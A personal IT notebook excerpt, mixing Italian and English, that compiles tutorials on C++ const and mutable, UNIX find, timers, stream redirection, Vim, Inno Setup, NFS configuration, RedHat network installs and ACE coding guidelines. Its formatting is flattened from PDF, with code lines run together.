Declaring a member function as const tells the compiler that the member function will not modify the object's data and will not invoke other member functions that are not const. The compiler won't take you at your word; it will check to make sure that you really don't modify the data. You can call a const member function for either a const or a non-const object, but you can't call a non-const member function for a const object (because it could modify the object). If we declare GetName() as a const member function, then the following code is legal:

void PrintPerson(const Person* const pThePerson){ cout << pThePerson->GetName() << endl; // OK}

// a const-reference is simply an alias to a const variablevoid PrintPerson2(const Person& thePerson){ cout << thePerson.GetName() << endl; // OK}

But if we don't declare it as const, then the code won't even compile.

void PrintPerson(const Person* const pThePerson){ // error - non-const member function called cout << pThePerson->GetName() << endl;}

void PrintPerson2(const Person& thePerson){ // error - non-const member function called cout << thePerson.GetName() << endl;}

Remember that non-static member functions take as their implicit first parameter a pointer called this, which points to a specific instance of the object. The this pointer is always const - you cannot make this point to anything else (in earlier versions of C++, this was legal).

Page 97: Appunti Informatica

A const member function in class Person would take a const class Person* const (const pointer to const Person) as its implicit first argument, whereas a non-const member function in class Person would take a class Person* const (const pointer to changeable Person) as its first argument.

The Mutable Storage Specifier

What if you wanted to have a const member function which did an expensive calculation and returned the result? It would be nice to be able to cache this result and avoid recalculation for subsequent calls to the function. But since it's a const member function, you can't store the cached result inside the class, because to do so, you'd have to modify a member variable (thereby violating const). You could make a fake this pointer using explicit casting:

class MyData{ public: /* the first time, do calculation, cache result in m_lCache, and set m_bCacheValid to true. In subsequent calls, if m_bCacheValid is true then return m_lCache instead of recalculating */

long ExpensiveCalculation() const { if (false == m_bCacheValid) { MyData* fakeThis = const_cast<MyData*>this; fakeThis->m_bCacheValid = true; fakeThis->m_lCache = ::SomeFormula(m_internalData); } return m_lCache; };

// change internal data and set m_bCacheValid to false to force recalc next time void ChangeData() { m_bCacheValid = false; m_internalData = ::SomethingElse(); };

private:

data m_internalData; long m_lCache; bool m_bCacheValid; };

This works, but it's somewhat ugly and unintuitive. The mutable storage specifier was added for this reason. A mutable member variable can be modified even by const member functions. With mutable, you can distinguish between "abstract const", where the user cannot tell that anything has been changed inside the class, and "concrete const", where the implementation will not modify anything, žµR5od. This caching of results is a perfect example of abstract const-ness. Anyone calling the const member function will not know or care whether the result has been cached or recalculated. For example:

class MyData{ public: /* the first time, do calculation, cache result in m_lCache, and set m_bCacheValid to true. In subsequent calls, if m_bCacheValid is true then return m_lCache instead of recalculating */

Page 98: Appunti Informatica

long ExpensiveCalculation() const { if (false == m_bCacheValid) { m_bCacheValid = true; m_lCache = ::SomeFormula(m_internalData); } return m_lCache; };

// change data and set m_bCacheValid to false to force recalc next time void ChangeData() { };

private:

data m_internalData; mutable long m_lCache; mutable bool m_bCacheValid; };

References

This paper represents a synthesis and compilation of information from the following sources: The C++ Programming Language, 2nd ed. by Bjarne Stroustrup. Advanced C++ Programming Styles & Idioms , by James O. Coplien Microsoft Visual C++ Online Help Conversations with Prof. Richard Rasala of the College of Computer Science at Northeastern

University The ISO Draft C++ Standard

Page 99: Appunti Informatica

Some examples of using UNIX find command. (Linux)

Preso da : http://www.athabascau.ca/html/depts/compserv/webunit/HOWTO/find.htm

Contents:

Introduction Search for file with a specific name in a set of files (-name) How to apply a unix command to a set of file (-exec). How to apply a complex selection of files (-o and -a). How to search for a string in a selection of files (-exec grep ...).

Introduction

The find command allows the Unix user to process a set of files and/or directories in a file subtree. You can specify the following:

where to search (pathname) what type of file to search for (-type: directories, data files, links) how to process the files (-exec: run a process against a selected file) the name of the file(s) (-name) perform logical operations on selections (-o and -a)

Search for file with a specific name in a set of files (-name)

find . -name "rc.conf" -print

This command will search in the current directory and all sub directories for a file named rc.conf. Note: The -print option will print out the path of any file that is found with that name. In general -print wil print out the path of any file that meets the find criteria.

How to apply a unix command to a set of file (-exec).

find . -name "rc.conf" -exec chmod o+r '{}' \;

This command will search in the current directory and all sub directories. All files named rc.conf will be processed by the chmod -o+r command. The argument '{}' inserts each found file into the chmod command line. The \; argument indicates the exec command line has ended. The end results of this command is all rc.conf files have the other permissions set to read access (if the operator is the owner of the file).

How to apply a complex selection of files (-o and -a).

find /usr/src -not \( -name "*,v" -o -name ".*,v" \) '{}' \; -print

This command will search in the /usr/src directory and all sub directories. All files that are of the form '*,v' and '.*,v' are excluded. Important arguments to note are:

-not means the negation of the expression that follows \( means the start of a complex expression. \) means the end of a complex expression. -o means a logical or of a complex expression.

In this case the complex expression is all files like '*,v' or '.*,v'

Page 100: Appunti Informatica

The above example is shows how to select all file that are not part of the RCS system. This is important when you want go through a source tree and modify all the source files... but ... you don't want to affect the RCS version control files.

How to search for a string in a selection of files (-exec grep ...).

find . -exec grep "www.athabasca" '{}' \; -print

This command will search in the current directory and all sub directories. All files that contain the string will have their path printed to standard output. If you want to just find each file then pass it on for processing use the -q grep option. This finds the first occurrance of the search string. It then signals success to find and find continues searching for more files.

find . -exec grep -q "www.athabasca" '{}' \; -print

This command is very important for process a series of files that contain a specific string. You can then process each file appropriately. An example is find all html files with the string "www.athabascau.ca". You can then process the files with a sed script to change those occurrances of "www.athabascau.ca" with "intra.athabascau.ca".

Page 101: Appunti Informatica

Timers (C++)C/C++ codes

ANSI C The clock() function returns clock ticks. #include <time.h>

clock_t start, end;double elapsed;

start = clock(); <code to be timed>end = clock();elapsed = ((double) (end - start)) / CLOCKS_PER_SEC;

The gettimeofday() function has a resolution of microseconds.

C++ #include <sys/time.h>#include <stdio.h>

int main(){struct timeval Tps, Tpf;

gettimeofday (&Tps, NULL); <code to be timed>gettimeofday (&Tpf, NULL);printf("Total Time (usec): %ld\n",(Tpf.tv_sec-Tps.tv_sec)*1000000 + Tpf.tv_usec-Tps.tv_usec);}

As with FORTRAN codes, MPI_Wtime() may also be used with C/C++ codes to determine the time since a particular date.

C++ example #include <mpi.h>double start, finish;

start = MPI_Wtime(); <code to be timed>finish = MPI_Wtime();

printf("Final Time: %f", finish-start);/* Time is in milliseconds since a particular date */

Page 102: Appunti Informatica

Output Redirection ( iostream ) (C++)

This code redirect the standard output to cout.txt file.

#include <iostream>#include <fstream>

using namespace std;

int main(){ { ofstream of("cout.txt"); of.copyfmt( cout ); cout.rdbuf( of.rdbuf() );

int i; while ( cin >> i ) cout << i; } // here the local of destroyes the streambuf of cout cout << 1; return 0;}

Be care, because when of goes out of life, destroyes the streambuffer. Therefore the following is the correct:

#include <iostream>#include <fstream>

using namespace std;

int main(){ { ofstream of("cout.txt"); of.copyfmt( cout ); streambuf *saved_buffer = cout.rdbuf(); cout.rdbuf( of.rdbuf() );

int i; while ( cin >> i ) cout << i; cout.rdbuf(saved_buffer); } // here the local of destroyes the streambuf of cout cout << 1; return 0;}

: Se si vuole utilizzare questa cosa in tutto il codice basta definire una variabile globale ofstream di modo da non distruggere lo streambuffer.

Page 103: Appunti Informatica

ios& copyfmt ( const ios& rhs );

Copy formatting information

Copies the values of all the internal members of the object rhs (except the state flags and the stream buffer pointer) to the corresponding members of *this. This includes the format flags, the fill character, the tie pointer and all formatting information. Every external object pointed in rhs is copied to a newly constructed object for *this.

The exception mask is the last to be copied.

Before copying any parts of rhs, this member function triggers an erase_event event which invokes the registered callback functions, if any (see ios_base::register_callback).

Parameters

rhsObject whose members are to be copied to *this

Return Value

The function returns *this.

Page 104: Appunti Informatica

Vim Search and Replace

[http://www.felixgers.de/teaching/emacs/vi_search_replace.html]

Change to normal mode with <ESC>. Search (Wrapped around at end of file):

Search STRING forward : / STRING. Search STRING backward: ? STRING.

Repeat search: n Repeat search in opposite direction: N (SHIFT-n)

Replace: Same as with sed, Replace OLD with NEW: First occurrence on current line: :s/OLD/NEW Globally (all) on current line: :s/OLD/NEW/g

Between two lines #,#: :#,#s/OLD/NEW/g Every occurrence in file: :%s/OLD/NEW/g

Editing in hex mode

There are many things vi can do, for instance invoke other commands to process files. That’s pretty cool.

Since installing Okteta isn’t always an option, here’s a small snippet on how to work simple capabilities into vi:

1. vi -b myfile 2. [in vi]: %!xxd 3. [to return to previous view]: %!xxd -r

Pretty easy, pretty handy. Something to keep in mind. Another thing to keep in mind: Always open binary files with the -b switch, otherwise you’ll damage the files when saving them with vi.

Page 105: Appunti Informatica

Inno Setup (Windows)

HOWTO: Run batch files

Under Inno Setup 4.0.9 and later, you may run a batch file by specifying the filename directly in the Filename parameter of a [Run] section entry:[Run]Filename: "{app}\YourBatchFile.bat"

Note: If you find that on Windows 95/98/Me the console window remains on the screen after the batch file has finished executing, add a "CLS" command to the end of it.In previous versions of Inno Setup, the recommended way to run a batch file is as follows:[Run]Filename: "{cmd}"; Parameters: "/C ""{app}\YourBatchFile.bat"""

Page 106: Appunti Informatica

Configure NFS (Linux)

Configurazione di un NFS server

Per configurare un server NFS su Linux è essenziale editare il file /etc/exports e avviare i servizi portmap e nfs.

Il file /etc/exports non è altro che un elenco dove si specifica quali risorse condividere e con quali modalità (Es read-only o read-write), e con quali credenziali i client potranno accedere a tale risorse (Es ip sorgente di una certa network).Per modificare tale file occorre essere utente root, di seguito è riportato un esempio del file:[opgnc@draco root]$ cat /etc/exportsLa directory /export e tutto il suo contenuto è esportato via NFS in moadalità read-only(ro) e ai soli client con un ip di network uguale a 10.0.0.0/24/export                10.0.0.0/255.255.255.0(ro)La directory /home/kernel e tutto il suo contenuto è esportato via NFS in moadalità read-write(rw) e ai soli client con un ip di network uguale a 10.0.0.0/24/home/kernel        10.0.0.0/255.255.255.0(rw)

Eseguite le modifiche al file /etc/exports, passiamo ad avviare i demoni RPC e NFS: /etc/rc.d/init.d/portmap start

/etc/rc.d/init.d/nfs start

Nel caso in cui il servizio era già attivo occorre semplicemente eseguire il seguente comando per fare in modo che il file /etc/exports venga riletto e si aggiornino le tabelle interne di appoggio del servizio NFS:exportfs -a

Configurazione di NFS Lato Client

Per montare sul sistema locale un filesystem NFS di un server remoto si può:

- usare una soluzione temporanea, utilizzando il comando mount, per rendere disponibile nella sessione corrente la share condivisa dal NFS server;

- aggiungere una riga di comandi al file /etc/fstab, in modo tale che ogni avvio il sistema monti e smonti automaticamente le share NFS.

Le comuni opzioni lato client per il mounting del filesystem remoto, sono le seguenti: -rw Monta la partizione NFS con i permessi di lettura e scrittura.-ro Monta la partizione NFS con i soli permessi di lettura.-bg Nel caso in cui il primo mounting di un nfs share vada in timeout, il processo passa in backgroung. -soft Permette al client NFS di riportare l'errore al processo che accede alle share NFS.-hard Permette al processo che accede ad un share nfs di rimanere appeso in caso di crash del server. Nel caso in cui la risorsa venga risprestinata, automaticamente anche il processo viene riprestinato, altrimenti l'unico modo per interrompere tale processo è quello di specificare l'opzione intr.-intr Permette di interrompere il processo nel caso di problemi con la share nfs.

Esempi:Comando Mount:    Per montare

Page 107: Appunti Informatica

mount -t nfs -o bg,intr,hard 10.0.0.25:/export/8.0 /rpmsPer smontareumount /rpms

Entry in /etc/fstabEntry in fstab10.0.0.25:/export/8.0    /rpms    nfs    bg,hard,intr,ro 0 0Comando per montare nella sessione correntemount -a -t nfs

Per poter montare una condivisione remota via nfs, sul client deve essere attivo il portmapper, per attivarlo (su RedHat e simili):/etc/init.d/portmap start

NFS e tcp wrappers

E' possibile tramite l'utilizzo di hosts.allow e hosts.deny limitare l'accesso alle share a determinati indirizzi.Di seguito è riportato un piccolo esempio di configurazione di hosts.allow e hosts.deny:

[root@draco root]# cat /etc/hosts.deny  # hosts.deny    This file describes the names of the hosts which are#        *not* allowed to use the local INET services, as decided#        by the '/usr/sbin/tcpd' server.Limitare l'accesso a tutti i singoli demoni relativi a NFSportmap:ALLlockd:ALLmountd:ALLrquotad:ALL

statd:ALL

[root@draco root]# cat /etc/hosts.allow # hosts.allow    This file describes the names of the hosts which are#        allowed to use the local INET services, as decided#        by the '/usr/sbin/tcpd' server.Consentire l'accesso solo a chi è considerato trustedportmap:10.0.0.0/255.255.255.0lockd:10.0.0.0/255.255.255.0mountd:10.0.0.0/255.255.255.0rquotad:10.0.0.0/255.255.255.0statd:10.0.0.0/255.255.255.0

Page 108: Appunti Informatica

Tuning di NFS

Essendo NFS un servizio basato sull'architettura client/server, il tuning, per ottimizzare le performance del servizio può avvenire sia lato server che lato client.

Ottimizzazione della velocità di trasferimento datiTramite le opzioni del comando mount rsize e wsize è possibile specificare la dimensione dei blocchi di dati in lettura e scrittura a livello di client, i valori che si possono indicare dipendono dalla release del kernel e della versione del protocollo NFS utilizzato.Il protocollo NFS v2 prevede un limite di 8k (Con le patch per implementare NFS over TCP per il kernel 2.4.x si può arrivare fino a 32k), mentre per il protocollo NFS v3 il limite risiede lato server e specificato dalla costante NFSSVC_MAXBLKSIZE.[neo@dido neo]$ cat /usr/src/linux/include/linux/nfsd/const.h |grep -i nfs[...]#define NFSSVC_MAXVERS        3#define NFSSVC_MAXBLKSIZE    8192#ifndef NFS_SUPER_MAGIC# define NFS_SUPER_MAGIC    0x6969[...]

NFS over TCPDal kernel 2.4.20 è possibile selezionare l'opzione "NFS over TCP" dal menu config per l'abilitazione di tale feature con la compilazione del kernel. Il fatto di utilizzare TCP al posto di UDP permette di aggiungere tutti i vantaggi di questo protocollo come la possibilità di ritrasmettere il singolo pacchetto perso piuttosto che tutta l'intera richiesta RPC oltre ad non essere un protocollo stateless come UDP.

In linea di massima questo vantaggio si ha solo in caso di una network non del tutto performante dove per qualche motivo gli errori di trasmissione sono elevati; in caso di una network performante ove gli errori di trasmissione e malformazione dei pacchetti è ridotto al minimo il protocollo UDP può risultare ancora una scelta sensata poichè tale protocollo prevede un tempo di latenza inferiore al protocollo TCP.

Numero istanze di NFSDLa configurazione standard (RedHat) prevede 8 istanze di nfsd, ed è possibile modificare questo valore modificando una variabile (RPCNFSDCOUNT) nello script di gestione del servizio: /etc/rc.d/init.d/nfs:[root@dido linux]# grep RPCNFSDCOUNT /etc/rc.d/init.d/nfsRPCNFSDCOUNT=8Indicativamente il numero di istanze dovrebbe essere maggiore nei server nfs che devono sopportare molto traffico da client diversi e ridotto in quelli che subiscono un trafico minore.

General TIPSOltre al tuning specifico di NFS occorre ottimizzare anche tutte quei aspetti non strettamente legati al servizio come la velocità di lettura e di scrittura su disco oppure utilizzare apparati di rete e cablaggio ottimizzati e performanti.

Page 109: Appunti Informatica

exportfs

Comando che permette di gestire le share condivise via NFS.

exportfs [-avi] [-o options,..][client:/path..]exportfs -r [-v]

exportfs [-av] -u [client:/path ..]

Opzioni-a Esegue l'export o l'unexport di tutte le directory.-o Pemette di specificare le opzioni che verrebbero utilizzate per configurare il server NFS tramite il file /etc/exports-i Ignora il file di configurazione di /etc/exports-r Esegue il re-export di tutte le directory, sincronizzando il file /var/lib/nfs/xtab con /etc/exports.-u Un-export di una o più directory-v Abilita il verbose mode

Page 110: Appunti Informatica

/etc/exports

Autore: neo - Ultimo Aggiornamento: 2004-06-04 11:45:18 - Data di creazione: 2004-06-04 11:45:18Tipo Infobox: PATH - Skill: 4- ADVANCED

E' il file che permette di gestire gli accessi alle share (condivisione) del server NFS oltre che il file di supporto per i comandi exportfs e mount.Come nella maggior parte dei file di configurazione, le linee bianche o che iniziano con '#' vengono ignorate.Ogni singola riga corrisponde ad una entry relativa ad una share e deve contenere almeno le seguenti informazioni:- Export point (la directory o la partizione che viene esportata)- Access List (Chi puo accedere alla risorsa e con quali permessi)

[root@draco root]# cat /etc/exports # Export NFS share, Added by neo at 08 Feb 2002# kickstart Share L'export point /export/7.2 può essere montata solo dai client provenienti dalla rete 10.0.0.0/24 e solo in read-only/export/7.2          10.0.0.0/255.255.255.0(ro)/export/7.3          10.0.0.0/255.255.255.0(ro)/export/8.0          10.0.0.0/255.255.255.0(ro)/home/ksfile         10.0.0.0/255.255.255.0(ro)# Errata & Contrib /export/contrib_7.2    10.0.0.0/255.255.255.0(ro)/export/contrib_7.3    10.0.0.0/255.255.255.0(ro)/export/errata_7.2    10.0.0.0/255.255.255.0(ro)/export/errata_7.3    10.0.0.0/255.255.255.0(ro)/export/errata_8.0    10.0.0.0/255.255.255.0(ro)/export/tarballs    10.0.0.0/255.255.255.0(ro)# HomeIn questo caso viene esportata la home dell'utente neo e può essere solo montata dall'host dido e in modalità read-write/home/neo       dido(rw)

La sintassi del file risulta molto simile al file export di Sun Solaris, tranne per alcune opzioni.Di seguito è riportato un elenco delle comuni opzioni e le possibili 'formattazione' di una entry:Opzioni comuniro Accesso in sola letturarw Accesso in lettura e scrittura no_root_squash Di default, tutte le richieste effettuate da root dal client vengono tracciate sul server come richieste effettuate da nobody.Se tale opzione è abilitata l'utente root sulla macchina client ha esattamente gli stessi privilegi dell'utente root della macchina server.Ovviamente ciò potrebbe avere implicazioni serie relative alla sicurezza, evitare di usare questa opzione senza un valido motivo.

no_subtree_check Opzione che abilita un check particolare per i file richiesti dal client. Utile solo in caso in cui la share esportate sono composto solo da una parte di un volume(ES. sottodirectory etc...), altrimenti è bene non specificare questa opzione per aumetare le prestazioni del server NFS.

Sintassi Access ListE' possibile specificare in più modi quali client possono accedere alle risorse sharate:Singolo HostOvvero si specifica semplicemente il singolo host o tramite il suo ip o tramite il nome che verrà risolto tramite DNS.Esempio:              /home/neo       dido(ro)netgrups

Page 111: Appunti Informatica

Si possono utilizzzare i netgrups di NIS, specifincandoli con il @Esempio:              /home/www       @webserver(ro) wildcardsE' possibile specificare wildcards come * o ? per ampliare il matching di una entry.Esempio:              Tutti gli host del dominio openskills.info possono accedere alla share /home/www in lettura e scrittura/home/www       *.openskills.info(rw)<IP Networks>Inoltre è possibile specificare una intera network o subnet, utilizzando al seguente sintassi:Indirizzo IP/Netmask Esempio:/home/www       192.168.0.0/255.255.255.0(rw)oppure/home/www       192.168.0.0/24(rw)

/var/lib/nfs/xtab

File di appoggio per NFS server per mantenere traccia dei filesystem esportati.

Esempio di un file  xtab di un kickstart server con un NFS server:

[root@draco root]# cat /var/lib/nfs/xtab[...]/export/8.0 10.0.0.93 (ro,async,wdelay,hide,secure,no_root_squash,no_all_squash,subtree_check,secure_locks, mapping=identity,anonuid=-2,anongid=-2)[...]

In questo caso la entry indica che il client con IP 10.0.0.93  ha eseguito il mounting della risorsa /export/8.0 con le opzioni evidenziate in parentesi.

Page 112: Appunti Informatica

Appunti Ncurses ( C++ - Linux)

Link diretto ad un’altro documento locale.

Appunti_ncurses.docx

Network Install HOWTO: Redhat Server Setup ( Linux )

Network-Install-HOWTO.html.gz

6. Impostazione del server RedHat

Questa sezione spiega come configurare il vostro server perché diventi un server di installazione di Linux RedHat. Potete configurare ogni distribuzione Linux per diventare un server di installazione Linux RedHat, questo computer a sua volta non deve essere necessariamente un computer con la distribuzione RedHat installata.

Questa guida assume che voi abbiate un computer con installato Linux che sia già configurato e installato e connesso alla vostra rete. Se avete bisogno di aiuto per installare Linux sul vostro server allora per cortesia consultate la sezione "Ulteriori informazioni" di questo HOWTO in Appendice A.

6.1 Configurazione dello spazio per i file

Affinché il vostro server possa funzionare come un server di installazione RedHat avrete bisogno di metterci su tutti i dati richiesti che vi serviranno per effettuare una installazione completa della versione di RedHat che state per servire. Per esempio, se siete abituati ad installare la Redhat utilizzando i Cd allora avrete bisogno di spazio sul vostro server per copiare TUTTO il contenuto di ogni Cd sul vostro server.

Perciò, ancora prima che voi pensiate di configurare la vostra macchina come server di installazione, dovete controllare che abbiate a disposizione lo spazio richiesto. Questa può sembrare una cosa stupida da controllare ma è molto importante e può essere facilmente dimenticata durante la configurazione.

Di quanto spazio avrete bisogno?

Una guida per calcolare lo spazio che vi potrà servire sarà l'ammontare dello spazio corrispondente ai Cd da cui intendete copiare in seguito. Potrebbe essere uno dei seguenti esempi approssimati:

Numero dei CDs x 650Mb Numero delle immagini ISO x 650Mb

Quanto spazio avete?

Avrete bisogno dell'appropriata quantità di spazio disponibile per il vostro sistema su alcuni filesystem locali. Non è un problema quale forma questo prende, se si tratti di un dispositivo RAID, un disco locale (sia EIDE che SCSI), ecc. Assicuratevi che lo spazio che intendete usare sia formattato con il filesystem scelto e che sia montato.

Page 113: Appunti Informatica

Potete controllare questo spazio con il comando:

df -h

Se il risultato vi mostra che avete abbastanza spazio per copiare i vostri dischi di installazione, allora potete continuare l'installazione. Se ciò non avviene allora è tempo di pensare ad un aggiornamento della vostra futura macchina server!

6.2 Copiate i media di installazione

Non appena sapete di avere abbastanza spazio disponibile è tempo di fare la copia del vostro media di installazione sul filesystem e la directory scelta. Per gli scopi di questo HOWTO useremo l'esempio seguente per rappresentare la directory dalla quale il nostro server di installazione sarà configurato e in esecuzione:

/install

Copiate il vostro media di installazione in /install. Il seguente esempio mostra come fare per copiare le vostre immagini del CD della RedHat nella cartella /install:

1. Montate il vostro CDp.e. mount /mnt/cdrom

2. Copiate i dati dal CDp.e. cp -av /mnt/cdrom /install

3. Smontate il CDp.e. umount /mnt/cdrom

4. Adesso cambiate i CD e ripetete dal passo 1 per ognuno dei Cd in vostro possesso.

6.3 Abilitate l'accesso remoto

E' tempo di rendere disponibili i vostri dati di installazione agli altri computer in rete. La RedHat può essere installata via rete utilizzando i protocolli NFS, HTTP e FTP. Potete selezionare quali di questi sarà usato sul client al momento dell'installazione. Se uno dei servizi non è configurato sul computer allora sarà disponibile per la selezione dal client ma il programma di installazione non funzionerà. Perciò, la miglior cosa è abilitare tutti e tre i protocolli sul vostro server (in modo che funzionino tutti su ogni macchina client) oppure, se non li abilitate tutti e tre, notificate la cosa molto chiaramente e dite quale servizio dovrà essere utilizzato per il vostro particolare server di installazione.

NFS

Il protocollo NFS è l'unico che funzionerà con il metodo di installazione grafico della RedHat quando installerete i vostri client. Perciò, se volete compiere installazioni in modalità grafica (al contrario di quelle testuali) allora dovete abilitare questo servizio sul vostro server.

Per installare via NFS avete bisogno che sul server siano verificate alcune condizioni:

La vostra cartella di installazione deve essere esportata NFS deve essere installato ed in esecuzione Il Portmap deve essere in esecuzione

Per esportare la vostra directory di installazione modificate il file /etc/exports ed aggiungetevi una voce per /install. Nel nostro esempio, noi useremo la seguente riga:

/install *(ro)

Page 114: Appunti Informatica

Quando avete salvato il vostro file di export allora dovete dire al demone NFS di leggere nuovamente il file di configurazione per esportare la directory che avete appena aggiunto. Fatelo eseguendo il comando:

exportfs –r [io ho dovuto far ripartire il servizio nfs...]

Questo esegue il più semplice export in sola lettura a tutti i computer della vostra rete. Se volete includere alcune opzioni avanzate nel vostro file export, per esempio esportando solo verso certi computer sulla rete o solo ad una certa sottorete, ecc. allora leggete le pagine del manuale per il file di esportazione in exports (5).

………..

A questo punto bisogna settare il client…..

In qualche modo fare il boot

Floppino,USB stick,lettore CD usb ...

Io ho usato un lettore CD attaccato via USB ed ho infilato dentro il prim CD RedHat e selezionato poi NFS per dirgli dove stavano gli rpm....

Floppy o USB stick dovrebbero funzionare così:

7.2 Avvio del computer

La maniera più semplice consiste nell'utilizzare un dischetto per avviare i vostri client pronti per l'installazione. Qualsiasi cosa di cui abbiate bisogno vi è fornita dai Cd della RedHat così come segue:

1. Se non avete ancora creato un disco di avvio allora fatelo adesso (avete bisogno di fare questo una sola volta, quando avrete un disco di avvio potrete installare quanti computer vorrete con un singolo disco):

o Localizzate l'immagine del dischetto di cui avete bisogno. Questa è sul primo CD della RedHat ed è in images/bootnet.img

o Dalla directory images sul CD copiate l'immagine sul vostro dischetto (siate sicuri di averne uno inserito nel lettore, ma non montato) usando il seguente comando:

o dd if=bootnet.img of=/dev/fd0

2. Se state facendo una installazione automatizzata (con il file di configurazione) allora dovete seguire questo passo (altrimenti passate al prossimo):

o Montate il vostro dischetto o mount /mnt/floppy

o Copiate il vostro file di configurazione nella directory principale del dischetto con il nome ks.cfg

o cpo percorso/file /mnt/floppy

o Smontate il vostro dischetto o umount /mnt/floppy

3. Inserite il vostro dischetto nel computer client su cui volete installare la RedHat. Assicuratevi che il dischetto sia nella lista dei dispositivi di avvio del vostro BIOS e accendete il computer per fare l'avvio dal dischetto.

4. Al cursore di avvio: o Se state facendo una installazione automatica: o linux ks=floppy

o Se non state utilizzando file di configurazione allora premete INVIO per l'installazione di default

5. Completate l'installazione:

Page 115: Appunti Informatica

o Se state facendo una installazione automatizzata allora dovete completare ogni parte del processo di configurazione che avete dimenticato nel file di configurazione. Se avete un file di configurazione completo siete a posto perciò andate a prendervi una tazza di qualcosa di piacevole e aspettate che l'installazione sia finita.

o Se state facendo una installazione manuale allora dovete completare l'installazione nella maniera normale, scorrendo ogni menù del programma di installazione della RedHat e selezionando le opzioni richieste per il vostro computer. Quando avete finito allora è tempo di una tazza di qualcosa di piacevole, non è necessario cambiare i dischi di installazione.

Ulteriori opzioni di avvio

Questa è una estensione della tecnica utilizzata per avviare i computer client per l'installazione automatica descritta sopra. Dovreste provare questo metodo se avete provato e fallito con il metodo precedente. Questa sezione dovrebbe aiutarvi se avete avuto problemi di connessione di rete durante l'avvio, per esempio, se non avete una scheda di rete supportata dal dischetto di avvio.

Potete creare un secondo dischetto da utilizzare nel processo di avvio che contenga ulteriori driver per le schede di rete. Questo potrebbe essere letto all'avvio e i driver caricati per la vostra scheda da qui. Ciò si fa come segue:

1. Nella directory images sul vostro CD dovreste trovare un file chiamato drvnet.img.2. Dalla directory images del vostro CD, copiate il file verso un dischetto diverso con il comando: 3. dd if=drvnet.img of=/dev/fd0

Di nuovo, siate sicuri che il vostro dischetto non sia montato quando eseguite questo comando.

4. Adesso avete un dischetto con i driver di rete. Dovreste ritornare alla vostra installazione come descritto sopra ma adesso aggiungete la parola chiave dd alla vostra linea di comando.

o Quindi per le installazioni automatizzate scriveremo: o linux dd ks=floppy

o Per l'installazione manuale scriveremo: o linux dd

5. Quando vi viene richiesto se avete un dischetto dei driver, selezionate SI. Quindi cambiate il disco di avvio con il vostro disco dei driver e i driver extra verranno caricati e utilizzati nella rilevazione della vostra scheda di rete.

6. Ora dovreste continuare con l'installazione così come descritto sopra.

Page 116: Appunti Informatica

http://www.dre.vanderbilt.edu/~schmidt/DOC_ROOT/ACE/docs/ACE-guidelines.html

ACE Software Development Guidelines ( C++ )

Generalo Every text file must end with a newline.o Use spaces instead of tabs, except in Makefiles. Emacs users can add this to their .emacs:

(setq-default indent-tabs-mode nil)

Microsoft Visual C++ users should do the following:

Choose: Tools -- Options -- Tabs Then Set: "Tab size" to 8 and "Indent size" to 2, and indent using spaces.

o Do not end text lines with spaces. Emacs users can add this to their .emacs:

(setq-default nuke-trailing-whitespace-p t)

Note for Microsoft Visual Studio .NET Users:

There is a macro project (ace_guidelines.vsmacros) located in $ACE_ROOT/docs that replaces tabs with spaces and removes trailing spaces each time you save a file.

o Try to limit the length of source code lines to less than 80 characters. Users with 14 inch monitors appreciate it when reading code. And, it avoids mangling problems with email and net news.

o Try to avoid creating files with excessively long names (45 characters). Moreover, ensure that the names of generated files e.g. MakeProjectCreator, tao_idl do not also go beyond that limit. Some operating systems cannot handle very long file names correctly.

o If you add a comment to code that is directed to, or requires the attention of, a particular individual: SEND EMAIL TO THAT INDIVIDUAL!.

o Every program should have a "usage" message. It should be printed out if erroneous command line arguments, or a -? command line argument, are provided to the program.

o An ACE-using program's entry point should use the portable form: o int ACE_TMAIN (int argc, ACE_TCHAR *argv[])

This form is portable to all ACE platforms whether using narrow or wide characters. The other two common forms:

int main (int argc, char *argv[]) int wmain (int argc, wchar_t *argv[])

as well as any other main entrypoint form should only be used when there is some overarching reason to not use the portable form. One example would be a Windows GUI program that requires WinMain.

See $ACE_ROOT/docs/wchar.txt for more information on ACE support on wchar.

o The program entry point function, in any form mentioned above, must always be declared with arguments, e.g.,

o int

Page 117: Appunti Informatica

o ACE_TMAIN (int argc, ACE_TCHAR *argv[])o {o [...]oo return 0;o }

If you don't use the argc and/or argv arguments, don't declare them, e.g.,

int ACE_TMAIN (int, ACE_TCHAR *[]) { [...]

return 0; }

Please declare the second argument as ACE_TCHAR *[] instead of ACE_TCHAR ** or char *[]. Ancient versions of MSC++ complained about ACE_TCHAR ** and char *[] is not Unicode-compliant.

main must also return 0 on successful termination, and non-zero otherwise.

o Avoid use of floating point types (float and double) and operations unless absolutely necessary. Not all ACE platforms support them. Therefore, wherever they are used, ACE_LACKS_FLOATING_POINT conditional code must be also be used.

o Avoid including the string "Error" in a source code filename. GNU Make's error messages start with "Error". So, it's much easier to search for errors if filenames don't contain "Error".

o Narrow interfaces are better than wide interfaces. If there isn't a need for an interface, leave it out. This eases maintenance, minimizes footprint, and reduces the likelihood of interference when other interfaces need to be added later. (See the ACE_Time_Value example .

o Never use assert() macros or related constructs (such as abort()) calls in core ACE, TAO, and CIAO library/framework code. These macros are a major problem for production software that uses this code since the error-handling strategy (i.e., abort the process) is excessive. Instead, extract out the expressions from assert() macros and use them as precondition/postconditions/invariants in the software and return any violations of these conditions/invariants via exceptions or error return values. It's fine to use assert() macros et al. in test programs, but make sure these tests never find their way into the core ACE, TAO, and CIAO library/framework code base.

Coding Styleo When writing ACE, TAO, and CIAO class and method names make sure to use underscores

('_') to separate the parts of a name rather than intercaps. For example, use o class ACE_Monitor_Controlo {o public:o int read_monitor (void);o // ...o };

rather than

class ACEMonitorControl { public: int readMonitor (void); // ...

Page 118: Appunti Informatica

};

Code Documentationo Use comments and whitespace (:-) liberally. Comments should consist of complete sentences,

i.e., start with a capital letter and end with a period.o Insert a svn keyword string at the top of every source file, Makefile, config file, etc. For C++

files, it is: o // $Id$

It is not necessary to fill in the fields of the keyword string, or modify them when you edit a file that already has one. SVN does that automatically when you checkout or update the file.

To insert that string at the top of a file:

perl -pi -e \ 'if (! $o) {printf "// \$Id\$\n\n";}; $o = 1;' file

o Be sure to follow the guidelines and restrictions for use of the documentation tools for ACE header files, which must follow the Doxygen format requirements. The complete documentation for Doxygen is available in the Doxygen manual. For an example header file using Doxygen-style comments, please refer to ACE.h.

o The header file comment should at least contain the following entries: o /**o * @file Foo.ho * @author Authors Name <[email protected]>o *o * A few words describing the file.o */

o A class should be commented this way: o /**o * @class Foo_Implo * @brief A brief description of the classo *o * A more detailed description.o */

